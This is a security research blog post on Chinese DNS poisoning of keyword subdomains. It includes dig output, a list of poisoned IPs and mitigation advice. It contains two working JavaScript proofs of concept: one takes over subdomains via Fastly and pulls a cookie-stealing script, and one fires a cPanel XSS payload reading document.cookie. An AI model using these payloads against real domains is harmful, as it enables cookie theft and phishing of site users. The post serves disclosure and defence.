At Assetnote, we are contstantly resolving millions of DNS as part of the operation of our Attack Surface Management platform. When performing DNS resolutions at the scale that we do across the number of diverse customer attack surfaces that we are monitoring we start to notice some really interesting behavior in the wild.
Around two years ago, we had a new customer onboard with us who had a large presence in China. We started seeing an incredible number of subdomains that were resolving to what seemed like random IP addresses.
These subdomains did not seem "real", in the sense that they did not look like legitimate infrastructure that this company had set up. In addition to this, these records did not consistently resolve to the same IP address.
While we thought this was bizarre behavior at the time, we focus heavily on ensuring that the customers of our Attack Surface Management platform only see assets that are "real" (meaning we automatically filter out wildcards and other records that are resolving that aren't legitimately owned by the company).
We came up with a plan to strategically filter out these subdomains for this customer, and we put it down to some sort of weird DNS misconfiguration that was isolated to this customer. At the time, we did not realize that we had actually come across China's systematic approach in poisoning or tampering with DNS queries.
After experiencing this across a few customers, we investigated this issue further and understood that China's tampering of DNS queries is based on patterns within the subdomain.
In 2022, it was reported that the total number of Chinese domains had reached 33.8 million. This does not account for all of the other TLDs that also route their DNS resolutions through Chinese infrastructure (i.e. AlibabaDNS, Cloudflare China, AWS Route53 China).
The attack vectors we have found in this blog post affect any domains that are being routed through Chinese infrastructure. It's hard to quantify the exact number of affected zones, but we estimate the number would be in the tens of millions.
After the discovery of this issue, we reviewed notes with Eric (todayisnew), who had independently found this issue and had spent a lot of time investigating it. Eric provided an additional exploitation vector that doesn't rely on the ability to claim a Fastly domain. You can skip to the attack vectors at the bottom of this blog post if you're not interested in the analysis.
We have also created an interactive tool to test if your domain is affected by this DNS poisoning issue, which can be found here.
Unreliable DNS Resolvers
Initially, we considered this inconsistency as an outlier or side-effect of unreliable DNS resolvers. “Unreliable” DNS resolvers where the resolver would not respond consistently to our requests, returning different records or no records to the same request. We considered if we were experiencing server-side load balancing of DNS records with methods such as DNS load balancing, or IP load balancing, however for these customers we concluded they were not using any of these features and we were experiencing genuinely “unreliable” DNS resolvers. We suspected this unreliability may come from other server-side load balancing algorithms, packet injection or packet tampering.
Note that unreliable DNS resolvers here refers to the authoritative name server for a DNS record, the server responsible for definitive answers about a given domain, in contrast to recursive resolvers that relay queries to authoritative DNS servers for you.
When our platform identifies a domain that resides on an unreliable authoritative DNS server, we typically perform further analysis to ensure that the subdomains are real. In this case, we found an interesting pattern, that all domains belonging to the .cn TLD, were being marked as unreliable.
Later, we realized that this poisoning was happening for other TLDs as well, as long as the nameservers that the domain used were located in China. This poisoning was not limited to domains with the .cn TLD.
Analysis
When debugging this DNS issue, we wanted to understand where exactly we were experiencing the inconsistency. Was it with our recursive resolvers or with the authoritative resolver?
❯ dig +trace 5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn
; <<>> DiG 9.10.6 <<>> +trace 5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn
;; global options: +cmd
. 515969 IN NS a.root-servers.net.
. 515969 IN NS b.root-servers.net.
. 515969 IN NS c.root-servers.net.
. 515969 IN NS d.root-servers.net.
. 515969 IN NS e.root-servers.net.
. 515969 IN NS f.root-servers.net.
. 515969 IN NS g.root-servers.net.
. 515969 IN NS h.root-servers.net.
. 515969 IN NS i.root-servers.net.
. 515969 IN NS j.root-servers.net.
. 515969 IN NS k.root-servers.net.
. 515969 IN NS l.root-servers.net.
. 515969 IN NS m.root-servers.net.
;; Received 525 bytes from 1.1.1.1#53(1.1.1.1) in 14 ms
sg. 172800 IN NS dsany3.sgnic.sg.
sg. 172800 IN NS dsany.sgnic.sg.
sg. 172800 IN NS ns4.apnic.net.
sg. 172800 IN NS pch.sgzones.sg.
sg. 172800 IN NS dsany2.sgnic.sg.
REDACTED.vn 3600 IN NS ns1.alibabadns.com.
REDACTED.vn 3600 IN NS ns2.alibabadns.com.
;; Received 655 bytes from 185.159.197.170#53(dsany2.sgnic.sg) in 129 ms
5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn 180 IN A 47.88.58.234
;; Received 122 bytes from 140.205.103.194#53(ns2.alibabadns.com) in 482 ms
We can see that walking the resolution tree, the domain above delegates to nameservers on alibabadns.com. Across multiple resolutions, we were observing that the IP address was unstable
assetnote@agent-1:~$ for i in $(seq 1 10); do dig 5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn @ns2.alibabadns.com | grep ' IN A'; done
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. 170 IN A 108.160.166.9
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. 224 IN A 162.125.32.12
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. 194 IN A 108.160.162.109
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. 134 IN A 116.89.243.8
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
;5-builtin.webproxy.idc-lorien21swww-web5245.bl.wwwytcos-linkpages.e.REDACTED.vn. IN A
Diving deeper, we tried to create a minimal reproducible example, and managed to distill it down to specifically any query including webproxy.id. Later we would find out there were a number of “keywords” that would be intercepted.
assetnote@agent-1:~$ for i in $(seq 1 10); do dig webproxy.id.REDACTED.vn @ns2.alibabadns.com | egrep 'IN\s+A'; done
;webproxy.id.REDACTED.vn. IN A
webproxy.id.REDACTED.vn. 104 IN A 128.242.245.43
;webproxy.id.REDACTED.vn. IN A
webproxy.id.REDACTED.vn. 231 IN A 65.49.26.98
;webproxy.id.REDACTED.vn. IN A
webproxy.id.REDACTED.vn. 203 IN A 199.59.149.237
;webproxy.id.REDACTED.vn. IN A
webproxy.id.REDACTED.vn. 107 IN A 199.59.148.9
;webproxy.id.REDACTED.vn. IN A
;webproxy.id.REDACTED.vn. IN A
webproxy.id.REDACTED.vn. 133 IN A 108.160.165.173
;webproxy.id.REDACTED.vn. IN A
webproxy.id.REDACTED.vn. 98 IN A 182.50.139.56
;webproxy.id.REDACTED.vn. IN A
webproxy.id.REDACTED.vn. 171 IN A 173.208.182.68
;webproxy.id.REDACTED.vn. IN A
;webproxy.id.REDACTED.vn. IN A
However, it turns out that the domain doesn’t even need to exist for us to receive invalid responses (please don’t buy this domain to prove us wrong). We would expect for this domain that the server would always return NXDOMAIN or REFUSED, however it sometimes does return a response. Additionally, the domain looked up didn’t have to be .cn as we initially expected, it only had to contain a keyword and be responded to by an authoritative nameserver hosted in China (we suspected).
assetnote@agent-1:~$ for i in $(seq 1 10); do dig webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com @ns2.alibabadns.com | egrep 'IN\s+A'; done
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 80 IN A 108.160.167.148
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 72 IN A 199.59.149.244
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 221 IN A 199.59.148.96
We also suspected that this was isolated to a single DNS resolver. However we soon found another customer exhibiting the same behavior. Except they instead used Cloudflare for their DNS which perplexed us even more.
assetnote@agent-1:~$ dig webproxy.id.32323232323232323232.REDACTED2.cn @ns45.dns.cf-ns.com
; <<>> DiG 9.18.18-0ubuntu0.22.04.1-Ubuntu <<>> webproxy.id.32323232323232323232.REDACTED2.cn @ns45.dns.cf-ns.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 35477
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;webproxy.id.32323232323232323232.REDACTED2.cn. IN A
;; ANSWER SECTION:
webproxy.id.32323232323232323232.REDACTED2.cn. 229 IN A 199.59.150.43
;; Query time: 204 msec
;; SERVER: 119.0.67.92#53(ns45.dns.cf-ns.com) (UDP)
;; WHEN: Mon Nov 20 00:31:52 UTC 2023
;; MSG SIZE rcvd: 75
We could confirm that our keyword intercepting was in place, because weproxy.id would consistently return NXDOMAIN as expected, and similarly, an entirely non-existent domain with webproxy.id would be returning records
assetnote@agent-1:~$ for i in $(seq 1 10); do dig webproxy.id.REDACTED2.cn @ns45.dns.cf-ns.com. | egrep 'IN\s+A'; done
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 69 IN A 202.160.128.40
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 191 IN A 31.13.95.48
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 203 IN A 192.133.77.191
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 127 IN A 67.228.102.32
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 95 IN A 104.244.46.57
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 244 IN A 103.214.168.106
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 113 IN A 104.244.46.208
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 144 IN A 103.39.76.66
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 78 IN A 192.133.77.189
;webproxy.id.REDACTED2.cn. IN A
webproxy.id.REDACTED2.cn. 106 IN A 59.188.250.54
assetnote@agent-1:~$ for i in $(seq 1 10); do dig weproxy.id.REDACTED2.cn @ns45.dns.cf-ns.com. | egrep 'IN\s+A'; done
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
;weproxy.id.REDACTED2.cn. IN A
assetnote@agent-1:~$ for i in $(seq 1 10); do dig webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com @ns45.dns.cf-ns.com. | egrep 'IN\s+A'; done
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 175 IN A 157.240.8.50
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 214 IN A 157.240.21.9
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 76 IN A 162.125.80.5
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 156 IN A 173.244.217.42
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 211 IN A 108.160.162.102
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 183 IN A 162.125.18.133
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 137 IN A 185.45.7.185
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 244 IN A 103.252.114.11
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 209 IN A 174.37.243.85
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 140 IN A 108.160.163.108
Coming back to our original question, was this a recursive resolver or authoritative resolver issue? Turns out the answer is neither! But something fishy is happening at the authoritative nameserver level. Attempting to resolve our entirely made up domain against Cloudflare’s resolvers, we find that the expected REFUSED response for a non-existent domain (weproxy.id…) is replaced with a NOERROR. We suspect therefore, that any resolution crossing the Great Firewall of China with specific keywords would be poisoned.
assetnote@agent-1:~$ dig webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com @ns45.dns.cf-ns.com.
; <<>> DiG 9.18.18-0ubuntu0.22.04.1-Ubuntu <<>> webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com @ns45.dns.cf-ns.com.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 29229
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;; ANSWER SECTION:
webproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. 190 IN A 31.13.67.33
;; Query time: 156 msec
;; SERVER: 61.159.93.124#53(ns45.dns.cf-ns.com.) (UDP)
;; WHEN: Mon Nov 20 00:35:54 UTC 2023
;; MSG SIZE rcvd: 86
assetnote@agent-1:~$ dig weproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com @ns45.dns.cf-ns.com.
; <<>> DiG 9.18.18-0ubuntu0.22.04.1-Ubuntu <<>> weproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com @ns45.dns.cf-ns.com.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 876
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
; EDE: 20 (Not Authoritative)
;; QUESTION SECTION:
;weproxy.id.1-2-3-4-5-6-7-CERTAINLYAUNIQUEDOMAIN.com. IN A
;; Query time: 180 msec
;; SERVER: 61.159.93.124#53(ns45.dns.cf-ns.com.) (UDP)
;; WHEN: Mon Nov 20 00:36:04 UTC 2023
;; MSG SIZE rcvd: 86
Turns out there already is literature published on this very topic:
Finding the bad IP addresses was a simple affair of resolving enough domains to sample what IP addresses were in the pool of returned domains. Turns out that there is a finite number of IPs that we could possibly return.
We have attached a list of the known poisoned IPs to the end of this post, and the corresponding whois information we pulled from these IPs. Although research from Hoang et al., identifies over 1700 IP addresses, we suspect our list may be different due to the narrower scope of keywords we’re resolving or more simply, a different list at that point in time was used.
Conversely, bad keywords could be identified with a reverse DNS lookup on these IPs and seeing what nonsensical domains are pointing to IPs that are known to belong to a single host.
Knowing that we can include a specific string inside the subdomain that will lead to a resolution to a set of IP addresses that are responding to HTTP requests, we dove into the possibilities of how an attacker could potentially use this to their advantage.
The first and most powerful technique that was discovered related to Fastly. A number of these IP addresses returned from China's poisoning were found to be pointing to Fastly. When you visit these poisoned subdomains in your browser, you would get an error message from Fastly stating that there are no such CDN profiles with that domain configured:
The default behavior of Fastly's CDN is that any one customer can add a domain to their CDN profile. If the domain is claimed by another customer, it cannot be used on another Fastly account.
This was the only prerequisite for being able to exploit the poisoning, the domain being targeted should not have been added to Fastly by another customer.
By registering a Fastly account, creating a CDN profile, and then adding *.domain.tld to the configuration, it was possible to serve all requests for any subdomain of that domain, when the requests were being served by Fastly.
But how do we practically exploit this in the wild? How do we take advantage of exploiting the origin of our target in the browser? The subdomains are clearly resolving to different IPs and are constantly rotating.
The first step is pointing the Fastly CDN profile to your server's IP as its origin server, so that all requests will be routed to your server for *.domain.tld. After doing so, host an image on your server, which will aid us in our exploitation process.
Since the subdomain poisoning patterns are predictable, we can leverage some client side code to generate a list of random subdomains that will lead to poisoned responses. While we do not know which subdomain will eventually point to Fastly, we can simply load up an image from all of the random subdomains until we win, leveraging event handlers to notify us about the successful poison.
<!DOCTYPEhtml><htmllang="en"><head><metacharset="UTF-8"><metaname="viewport"content="width=device-width, initial-scale=1.0"><title>Image Loading</title></head><body><script>// Function to generate a random string of length 10functiongenerateRandomString(){let randomString ='';for(let i =0; i <10; i++){
randomString += Math.random().toString(36).charAt(2)+ Math.random().toString(36).charAt(2);}return randomString;}// Function to handle image onload eventfunctiononLoad(event){let imageUrl = event.target.src;alert(`Image loaded successfully: ${imageUrl}`);let origHost =newURL(imageUrl).host;let randomString =generateRandomString();let scriptUrl =`http://${origHost}/cookie.php?${randomString}=yespls`;let scriptTag = document.createElement('script');
scriptTag.src = scriptUrl;
scriptTag.onload = onLoadAgain;
document.head.appendChild(scriptTag);}functiononLoadAgain(event){let scriptUrl = event.target.src;alert(`Script loaded successfully: ${scriptUrl}`);alert(`Cookie: ${window.cookiestolen}`);}// Function to handle image onerror eventfunctiononError(event){
console.error(`Image failed to load: ${event.target.src}`);}// Generate thousands of random strings and create img tags with onerror and onload handlersfor(let i =0; i <1000; i++){let randomString =generateRandomString();let imageUrl =`http://${randomString}.webproxy.idc.target.vn/slowly.png`;let imgTag = document.createElement('img');
imgTag.src = imageUrl;
imgTag.onerror = onError;
imgTag.onload = onLoad;
document.body.appendChild(imgTag);}</script></body></html>
When speaking with Eric about the chinese DNS poisoning issue, he shared a proof of concept that was more universal than our Fastly proof-of-concept but had a slightly lower impact as you cannot capture HTTPOnly cookies.
Eric let us know that he had spent over 100 hours on this issue from a research perspective, coming to similar conclusions to us that it affects any domain that is routed through China. He was keen for this issue to be discussed more widely and with his permission we are including the proof-of-concept he created to demonstrate the risks of DNS poisoning from China.
This proof-of-concept relies on the fact that one of the IPs within the pool of IPs returned through the poisoning will be running a vulnerable version of cPanel, leading to XSS. It will iterate through generated subdomains until the XSS fires.
We have simplified Eric's proof-of-concept and our version can be found below:
<!DOCTYPEhtml><htmllang="en"><head><metacharset="UTF-8"><metaname="viewport"content="width=device-width, initial-scale=1.0"><title>Image Loading</title></head><body><script>// Function to generate a random string of length 10functiongenerateRandomString(){let randomString ='';for(let i =0; i <10; i++){
randomString += Math.random().toString(36).charAt(2)+ Math.random().toString(36).charAt(2);}return randomString;}let imageElements =[];// Function to handle image onload eventfunctiononLoad(event){let imageUrl = event.target.src;alert(`Image loaded successfully: ${imageUrl}`);let origHost =newURL(imageUrl).host;let randomString =generateRandomString();let newUrl =`http://${origHost}/cpanelwebcall/<img%20src=x%20onerror=alert(document.location+document.cookie)>`;// Create an iframe and load the URLlet iframe = document.createElement('iframe');
iframe.src = newUrl;
iframe.style.width ='500px';
iframe.style.height ='300px';
document.body.appendChild(iframe);}// Function to handle image onerror eventfunctiononError(event){
console.error(`Image failed to load: ${event.target.src}`);}// Function to cancel loading of current imagesfunctioncancelCurrentImages(){
imageElements.forEach(img=>{
img.src ='';// Clear the src attribute
img.remove();// Remove the image element from the DOM});
imageElements =[];// Clear the array for the next batch}// Function to load a batch of imagesfunctionloadBatch(batchNumber){if(batchNumber >0){cancelCurrentImages();// Cancel loading of previous batch}for(let i =0; i <100; i++){// Load 100 images per batchlet randomString =generateRandomString();let imageUrl =`http://${randomString}.morphium.info.test2.target.cn:2095/unprotected/cpanel/images/webmail-logo.svg`;let imgTag = document.createElement('img');
imgTag.src = imageUrl;
imgTag.onerror = onError;
imgTag.onload = onLoad;
document.body.appendChild(imgTag);
imageElements.push(imgTag);// Add the image element to the array}if(batchNumber <10){// Total 10 batches to make 1000 imagessetTimeout(()=>loadBatch(batchNumber +1),3000);// Wait for 3 seconds before next batch}}// Start loading images in batchesloadBatch(0);</script></body></html>
What is the impact?
As this vulnerability is effectively the same as a subdomain takeover, the same impacts that affect typical subdomain takeover vulnerabilities apply. There were two separate exploitation vectors described in this blog post and they both have slightly different impacts.
With the Fastly takeover technique, you are able to listen to all traffic that gets routed to your origin. This is more impactful than just an XSS vulnerability, as it means that it will be possible to steal HTTPOnly cookies which are not made available to JavaScript.
Typically, this would be even more impactful if existing infrastructure was making calls to the subdomain that has been taken over, but due to the dynamic nature of these subdomains, the chances of this are slim. The real value of this attack vector is still client-facing, attacking end users.
Unfortunately, this attack's prerequisite is that the domain must not be taken on Fastly already. This may prevent attackers from being able to exploit this issue successfully for some high profile domains that legitimately use Fastly.
Alternatively, the cPanel XSS vector is much more universal and works on any domain affected by China's poisoning. The only noticeable difference between the Fastly vector and this one is that it is not possible to steal HTTPOnly cookies.
For both attack vectors, it is not possible to steal cookies that have been marked as "Secure", as they will only be transmitted when the communication with the origin is via https. There are angles of using a self signed certificate, but it would require the user to explicitly ignore certificate warnings.
There may be a way to claim a TLS certificate if you are able to retry a subdomain enough times with the certificate provider until it hits your Fastly origin, but this wasn't immediately possible with our testing.
Of course, as with any cross-site scripting attack, it is possible to phish users and perform any other type of client side attack while you have the origin of *.target.tld. Depending on the configuration of the target's web applications, cookie stealing or cross-application interactions may be possible.
Theories Explaining This Behaviour
On the surface, this behavior is very odd and we began to wonder why this infrastructure operated this way. Based on our analysis of the keywords that trigger this behavior (see Appendix below), it seems that the most logical theory is that this is simply a censorship mechanism.
Our leading theory is that the Great Firewall inside China is manipulating DNS responses due to blacklisted or blocked keywords. This affects any system that has to pass through the Great Firewall before it reaches the end-user/client. Most of the keywords relate to VPN software, proxies, adult sites, file and text sharing and torrents. This is consistent with the kinds of material that China is known to censor within its borders.
This theory is also supported by the behaviour of the keyword filtering which seems to imply greedy filtering. Rather than blocking a specific single domain such as say tracker.thepiratebay.org this system appears to be triggering if the keyword is embedded anywhere in the domain. This is why we poisoned DNS responses for non-existent domains.
This does beg the question that if censorship is the goal why not simply sinkhole to a non-functional IP address? This one is a bit harder to answer. There is a lot of diversity in the what networks the IPs in these poisoned records point to. Infrastructure for large social media networks, CDNs, cloud platforms and even random blogs. Our best guess is that this is simply random and not intentional and the prevalence of these sorts of organizations is simply that they are more likely to own a large IP space.
What Can Be Done to Mitigate the Risk?
Unfortunately there is no simple way for organizations to address this risk. Operating infrastructure in China is not as simple as signing up to some hosting provider in China with a credit card. Any business that wants to host in China or even have any kind of Internet presence inside China needs to apply for and obtain a valid Chinese Internet Content Provider (ICP) license before anything can be hosted.
There are a number of very specific requirements to have this license including:
You must have a domain name registered with a Chinese domain name registrar.
You must use servers located in China.
You must use a hosting provider that is licensed by the Chinese government.
These requirements mean that any business that wants to have an Internet presence in China must host their infrastructure in China and thus are susceptible to the DNS poisoning that we have highlighted in this post. While simply not operating in China would solve this it is obviously not a realistic solution.
One solution would be to host your nameservers outside of China. While this would mitigate against the DNS poisoning it does present concerns around speed, reliability and general user experience for the Chinese users of these sites.
One thing that organization can more easily control that will limit the impact of some of the issues demonstrated in this post is to ensure that basic web security hygiene is implemented. This means ensuring that all cookies have the “Secure” flag, so that they are not accessible by web servers that are not being communicated to via HTTPs / TLS. Enforcing the “HTTPOnly” flag on all cookies will mean that a simple XSS vulnerability cannot be escalated to steal sensitive cookies.
Unfortunately, while basic web security hygiene goes a long way towards mitigating the attacks presented here defacement and phishing still pose a real and exploitable risk.
Special Thanks
Eric Head (todayisnew) for sharing additional keywords and research related to this DNS poisoning attack.
Sean Yeoh with help in the data analysis of returned poisoned IP addresses.
Our customers of Assetnote who contributed valuable insights into this attack and the difficulties in mitigating the issue.
103.200.30.143
103.200.31.172
103.214.168.106
103.226.246.99 org-name: RADIOACTIVE PTE. LTD.
103.228.130.27
103.228.130.61
103.230.123.190
103.240.180.117
103.240.182.55
103.246.246.144 org-name: Cloudie Limited
103.252.114.101 org-name: Twitter Asia Pacific Pte. Ltd.
103.252.114.11 org-name: Twitter Asia Pacific Pte. Ltd.
103.252.114.61 org-name: Twitter Asia Pacific Pte. Ltd.
103.252.115.153 org-name: Twitter Asia Pacific Pte. Ltd.
103.252.115.169 org-name: Twitter Asia Pacific Pte. Ltd.
103.252.115.221 org-name: Twitter Asia Pacific Pte. Ltd.
103.252.115.49 org-name: Twitter Asia Pacific Pte. Ltd.
103.252.115.53 org-name: Twitter Asia Pacific Pte. Ltd.
103.252.115.59 org-name: Twitter Asia Pacific Pte. Ltd.
103.39.76.66 org-name: HONG KONG ALPHA INTL LTD
103.42.176.244
103.56.16.112
103.73.161.52 org-name: Cache Tele Limited
103.97.176.73 org-name: HONGKONG CLOUD NETWORK TECHNOLOGY CO., LIMITED
103.97.3.19 org-name: HK Kwaifong Group Limited
104.16.251.55 OrgName: Cloudflare, Inc.
104.16.252.55 OrgName: Cloudflare, Inc.
104.23.124.189 OrgName: Cloudflare, Inc.
104.23.125.189 OrgName: Cloudflare, Inc.
104.244.43.104 OrgName: Twitter Inc.
104.244.43.128 OrgName: Twitter Inc.
104.244.43.136 OrgName: Twitter Inc.
104.244.43.167 OrgName: Twitter Inc.
104.244.43.182 OrgName: Twitter Inc.
104.244.43.208 OrgName: Twitter Inc.
104.244.43.228 OrgName: Twitter Inc.
104.244.43.229 OrgName: Twitter Inc.
104.244.43.231 OrgName: Twitter Inc.
104.244.43.234 OrgName: Twitter Inc.
104.244.43.248 OrgName: Twitter Inc.
104.244.43.35 OrgName: Twitter Inc.
104.244.43.52 OrgName: Twitter Inc.
104.244.43.57 OrgName: Twitter Inc.
104.244.43.6 OrgName: Twitter Inc.
104.244.45.246 OrgName: Twitter Inc.
104.244.46.165 OrgName: Twitter Inc.
104.244.46.17 OrgName: Twitter Inc.
104.244.46.185 OrgName: Twitter Inc.
104.244.46.186 OrgName: Twitter Inc.
104.244.46.208 OrgName: Twitter Inc.
104.244.46.21 OrgName: Twitter Inc.
104.244.46.211 OrgName: Twitter Inc.
104.244.46.244 OrgName: Twitter Inc.
104.244.46.246 OrgName: Twitter Inc.
104.244.46.5 OrgName: Twitter Inc.
104.244.46.52 OrgName: Twitter Inc.
104.244.46.57 OrgName: Twitter Inc.
104.244.46.63 OrgName: Twitter Inc.
104.244.46.71 OrgName: Twitter Inc.
104.244.46.85 OrgName: Twitter Inc.
104.244.46.9 OrgName: Twitter Inc.
104.244.46.93 OrgName: Twitter Inc.
104.31.142.88 OrgName: Cloudflare, Inc.
107.181.166.244 OrgName: Performive LLC
108.160.161.20 OrgName: Dropbox, Inc.
108.160.161.83 OrgName: Dropbox, Inc.
108.160.162.102 OrgName: Dropbox, Inc.
108.160.162.104 OrgName: Dropbox, Inc.
108.160.162.109 OrgName: Dropbox, Inc.
108.160.162.115 OrgName: Dropbox, Inc.
108.160.162.31 OrgName: Dropbox, Inc.
108.160.162.98 OrgName: Dropbox, Inc.
108.160.163.102 OrgName: Dropbox, Inc.
108.160.163.106 OrgName: Dropbox, Inc.
108.160.163.108 OrgName: Dropbox, Inc.
108.160.163.112 OrgName: Dropbox, Inc.
108.160.163.116 OrgName: Dropbox, Inc.
108.160.163.117 OrgName: Dropbox, Inc.
108.160.165.11 OrgName: Dropbox, Inc.
108.160.165.139 OrgName: Dropbox, Inc.
108.160.165.141 OrgName: Dropbox, Inc.
108.160.165.147 OrgName: Dropbox, Inc.
108.160.165.173 OrgName: Dropbox, Inc.
108.160.165.189 OrgName: Dropbox, Inc.
108.160.165.211 OrgName: Dropbox, Inc.
108.160.165.212 OrgName: Dropbox, Inc.
108.160.165.48 OrgName: Dropbox, Inc.
108.160.165.53 OrgName: Dropbox, Inc.
108.160.165.62 OrgName: Dropbox, Inc.
108.160.165.8 OrgName: Dropbox, Inc.
108.160.165.9 OrgName: Dropbox, Inc.
108.160.166.137 OrgName: Dropbox, Inc.
